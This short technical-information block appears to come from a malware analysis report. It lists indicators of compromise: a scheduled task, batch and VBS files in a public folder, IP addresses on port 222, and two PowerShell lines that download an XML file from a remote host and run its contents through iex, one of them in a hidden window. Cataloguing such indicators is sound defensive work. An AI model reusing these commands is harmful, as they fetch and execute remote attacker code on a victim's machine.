Technical Information
- <SYSTEM32>\tasks\elliotez
- C:\users\public\elliotez.bat
- C:\users\public\elliotez.vbs
- '18#.#1.157.121':222
- http://18#.##.157.121:222/1.txt via 18#.#1.157.121
- http://18#.##.157.121:222/xxx.jpg via 18#.#1.157.121
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $xmlell = New-Object System.Xml.XmlDocument; $xmlell.'Load'('http://185.81.157.121:222/1.txt'); iex $xmlell.command.a.execute' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $xmlell = New-Object System.Xml.XmlDocument; $xmlell.'Load'('http://185.81.157.121:222/1.txt'); iex $xmlell.command.a.execute